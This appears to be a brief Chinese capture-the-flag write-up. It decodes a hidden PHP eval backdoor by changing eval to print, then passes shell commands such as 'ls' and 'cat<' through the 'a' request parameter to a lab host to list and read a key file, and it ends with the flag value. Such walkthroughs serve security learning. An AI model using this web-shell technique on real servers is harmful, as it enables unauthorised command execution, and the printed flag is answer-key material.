一、打开网站的到了
此时我们需要运行一下该代码,在phpStudy中创建一个文件1.php,把代码复制进去,需要把执行代码eval改成打印print,然后运行127.0.0.1/1.php得到
echo $_REQUEST[a];; ?>
二、发现echo $_REQUEST[a];; ?>中REQUEST接收其实与get、post是一样的,故可以用[a]去拼接,?a=ls,综合上述可以得到http://182.44.114.36:47140/f.php?a=ls,运行得到
key_10830880425501.php。
三、查看key_10830880425501.php文件的内容,http://182.44.114.36:47140/f.php?a=cat<key_10830880425501.php,发现界面没有任何有用的信息,这是就要考虑到是不是被隐藏起来了,需要查看一下源代码,
最终得到mozhea9c8b0ccb5a59847fbc05c40ea1
四、提交key通关。
